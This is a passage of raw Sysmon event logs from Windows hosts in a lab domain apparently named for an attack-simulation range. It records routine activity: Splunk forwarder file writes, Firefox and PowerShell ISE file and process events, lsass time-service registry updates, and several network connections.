Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4CB211BA5F5F90E6427439939464D6A,SHA256=F2CEEF0340E5717F742F8513E9B7D77DD0E6A56CCE22D52CBA907BE3DDDE0EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:58.210{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7144ed.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:59.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D11ACCF485E88CF2749C78F0FDA321,SHA256=E8FE0C6DB59D5248C1C674A62072A4216E492DA9F1840C122DE219BEBA0BAB4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:59.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F247C840B611CD29C60C457F799FD5AF,SHA256=7E1629D0E71C1042021D1979373F8C97F926ED08BDC70411D69CB669C7925685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6FB4EACF71BCCBDE83319E9F625A93,SHA256=AABDB798B87597BAFD62D176BA953A3B0BCC250A481151AEE8C6258A4B09340F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:00.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E89709D62DDBA9663F4EA3C0ECC17344,SHA256=25173068B9333E5999787F018F32D12EA1224FFAD4AE98AA06F853ABD8F539BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\
USER32.dll+11b2c 10341000x80000000000000001052345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001052343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001052342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf714e91.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.656{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=04172E096871FA5DEFBDF54D4BF7D7E5,SHA256=E3D8F9F68C4CF1D7EB746F47EE1D426B8D979B596EE1E53C91E5DC7A41AFED4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.729{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51153-false10.0.1.12-8000- 23542300x80000000000000001052348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:01.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D64D2D9AB441C19FD47F45469A89C7,SHA256=925A20C779AE465D2FC6924DE1D0AF9097677D39A16C01C074F949F4810E75F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:01.916{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809BA0A385C7259FDD298310D824EF51,SHA256=770B0EE6497BC52B82BC5A0F0BC29023EDE2FE4A778A04A6C906A456A0D32170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:02.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1213CEACB11F616ED71C376DACDA80A4,SHA256=171F797D23A6EC736B2652DDD056E28E0EFEBD47A7D229F3C66CB1F9398F3396,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:02.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECAAD83484F076E225AC07C8D1A1321D,SHA256=18E65A9225FDE33C480B8B06996D67703B0EE3E522C8951A185E89F930CD256E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:01.377{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57377-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.921{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9DE4C2D85E16DC949217E98D728766,SHA256=E2B8E86E49D776C23807ED7EC1C21A54604BC706E10B57DA3B16E2927B66ECE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:03.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B084634EA849894C839DC2BD4E9B749,SHA256=8C61786D43B7190A00B9DD3B1ABB8DD4934C8CBA9202CC941F685735F440B99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E333DAA00100B95C076F824523ED600,SHA256=C97290A86891589016B33ACC28D644E4583A18DF70FDC6D4D6B973E541FE0A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=707136D61E4EC9CD3986F58852C33E33,SHA256=35213A5C94DAFB7407552BD317452A67EB42B6E7BB156EF3F9B9E03B69ACBBF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:04.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E764D682B1ABCE556F80242A65F2CAA,SHA256=41702A39C825852B89BC34EAA0A5DD892C2C3F9510EA99E0096916AD656C69E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.680{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse195.78.54.188-59512-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 13241300x8000000000000000809150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000809149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6a1ca6) 13241300x8000000000000000809148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0xadf671d5) 13241300x8000000000000000809147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x0fbad9d5) 13241300x8000000000000000809146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x717f41d5) 13241300x8000000000000000809145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 
13241300x8000000000000000809144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6a1ca6) 13241300x8000000000000000809143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0xadf671d5) 13241300x8000000000000000809142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x0fbad9d5) 13241300x8000000000000000809141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x717f41d5) 23542300x80000000000000001052355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:05.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=915F549529C200F624A6C835D888749B,SHA256=BA4B1919B8B155520847BC0ECE6188A3AFA2223BE98F92F1E82D86FF7C8D7A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:04.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DDBB44461D0DE2432A912BD73B4913A,SHA256=12471AD9F1EE1C77DB3F9EA192E2A2825BC328A5C84A9DA8305562C6BC8CE91A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.952{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD361E447914B070AE6C94C44AE4957,SHA256=A42BA5190C1A194D04C39BAE1095A778635D946D40BA528CFF8D155963B782F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:06.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58CADFEE4A27095063EDE964DDB845D,SHA256=384A1A4339E58AE80F191D64FCE88EBFCDE3EC985886AB35997735D537DDCB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.375{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001052360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla 
Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.411.27391487C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:01:06.319{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.411.27391487C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001052356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.623{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51154-false10.0.1.12-8000- 23542300x80000000000000001052364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734ECE7A8D5005F4DB19EF289CDE4C92,SHA256=1860BF5EEEBE6603861EA4774D13BAE8216EC43A6AB15ECC30C72F38B96EAE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:07.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFFDE13CDAA218F31CDDD62BB104571C,SHA256=AB4DEEACB5C64C21882DB74D3003D107ED018473BFB21DF72FFE8F36DCF48FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.189{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E333DAA00100B95C076F824523ED600,SHA256=C97290A86891589016B33ACC28D644E4583A18DF70FDC6D4D6B973E541FE0A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.989{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702DFD7BAD073B47DA38E8D5C4287489,SHA256=9FF9B106DE9ACB94E7454D9EC8AF82DF8515C0ACBC1EE887802AC64BF1C71497,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:06.393{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
